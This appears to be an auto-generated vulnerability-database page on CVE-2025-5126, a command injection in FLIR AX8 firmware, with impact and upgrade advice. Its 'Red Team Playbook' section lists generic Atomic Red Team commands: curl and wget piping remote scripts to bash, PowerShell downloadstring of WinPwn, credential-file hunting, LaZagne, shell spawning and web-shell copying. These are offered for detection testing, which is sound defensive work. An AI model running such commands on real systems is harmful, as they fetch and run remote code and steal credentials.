CVE-2025-5126
Overview
The vulnerability is a command injection flaw rooted in improper input validation within the setDataTime function of the settingsregional.php file in Teledyne FLIR AX8 firmware. Specifically, manipulation of the date and time parameters (year, month, day, hour, minute) allows injection of arbitrary commands. This occurs due to unsafe handling of these arguments in the internal web application component responsible for regional settings configuration.
Vulnerability Description
A vulnerability was found in Teledyne FLIR AX8 up to 1.46.16. This vulnerability affects the function setDataTime of the file \usr\www\application\models\settingsregional.php. Performing manipulation of the argument year/month/day/hour/minute results in command injection. The attack may be initiated remotely. The exploit has been made public and could be used. Upgrading to version 1.49.16 is able to resolve this issue. Upgrading the affected component is recommended. The vendor points out: "FLIR AX8 internal web site has been refactored to be able to handle the reported vulnerabilities."
Impact
An attacker with network access and low-level privileges can execute arbitrary system commands remotely via the vulnerable setDataTime function. This enables full compromise of the device, including data manipulation, service disruption, or pivoting within the network. The CVSS vector indicates low attack complexity and no user interaction required (AC:L/UI:N), with high impact on confidentiality, integrity, and availability (C:H/I:H/A:H). This elevates risk for critical operational environments relying on FLIR AX8 devices.
Solution
Upgrade Teledyne FLIR AX8 firmware to version 1.49.16 or later, as specified in the vendor advisory referenced on https://vuldb.com/?id.310204. The vendor has refactored the internal web site to address this and related vulnerabilities. Follow the official upgrade instructions provided by FLIR to ensure proper patch application and mitigation of the command injection flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Teledyne FLIR AX8 firmware, specifically within the setDataTime function of the settingsregional.php file, allows for command injection through manipulated input parameters such as year, month, day, hour, and minute. This flaw arises from inadequate input validation, enabling an attacker to inject arbitrary commands into the system. When these parameters are not properly sanitized, an attacker can exploit this weakness to execute malicious commands on the underlying operating system, potentially leading to unauthorized access or control over the device. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk to the integrity and confidentiality of the affected systems.
Attack vectors for this vulnerability primarily involve remote exploitation, which significantly broadens the potential threat landscape. An attacker could leverage this flaw by crafting a specially formatted request to the vulnerable web interface of the FLIR AX8 device. Given that the exploitation can be conducted remotely, it poses a substantial risk, especially if the device is deployed in sensitive environments such as surveillance or security systems. Scenarios could include an attacker gaining access to sensitive data, manipulating device configurations, or even using the compromised device as a pivot point to infiltrate other systems within the network. The public disclosure of the exploit further exacerbates the risk, as it provides malicious actors with the necessary information to launch attacks without requiring advanced technical skills.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on the FLIR AX8 for critical operations. The potential for unauthorized access to surveillance feeds or the manipulation of security settings could lead to significant breaches of security protocols, resulting in financial losses, reputational damage, and legal ramifications. Additionally, if the device is part of a larger network, the compromise could facilitate lateral movement, allowing attackers to access more sensitive systems and data. The business risk extends beyond immediate financial implications, as organizations may face regulatory scrutiny and loss of customer trust, particularly if sensitive data is exposed or misused.
To effectively detect and mitigate this vulnerability, organizations should prioritize upgrading to the latest firmware version, which addresses the identified security flaws. Regularly monitoring and applying security patches is crucial in maintaining the integrity of the system. Additionally, implementing network segmentation can help limit the exposure of vulnerable devices to the internet, thereby reducing the attack surface. Intrusion detection systems (IDS) can also be employed to monitor for unusual traffic patterns or attempts to exploit the vulnerability. Furthermore, conducting regular security assessments and penetration testing can help identify potential weaknesses before they can be exploited by malicious actors.
In conclusion, the command injection vulnerability in the Teledyne FLIR AX8 firmware represents a significant threat that requires immediate attention from affected organizations. The combination of remote exploitability, potential for severe operational impact, and the availability of public exploits necessitates a proactive approach to security management. By prioritizing timely updates, employing robust detection mechanisms, and fostering a culture of security awareness, organizations can mitigate the risks associated with this vulnerability and safeguard their critical assets.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Flir | Flir Ax8 Firmware | All |
cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-5126 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.310204 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.310204 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.570725 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.572266 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.572275 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.572277 |
| github.com |
GitHub CVE
broken-link
|
https://github.com/YZS17/CVE/blob/main/Remote%20Command%20Injection%20in%20parameter%20%24minute.md |
| github.com |
GitHub CVE
broken-link
exploit
|
https://github.com/YZS17/CVE/blob/main/Remote%20Command%20Injection%20in%20parameter%20%24hour.md |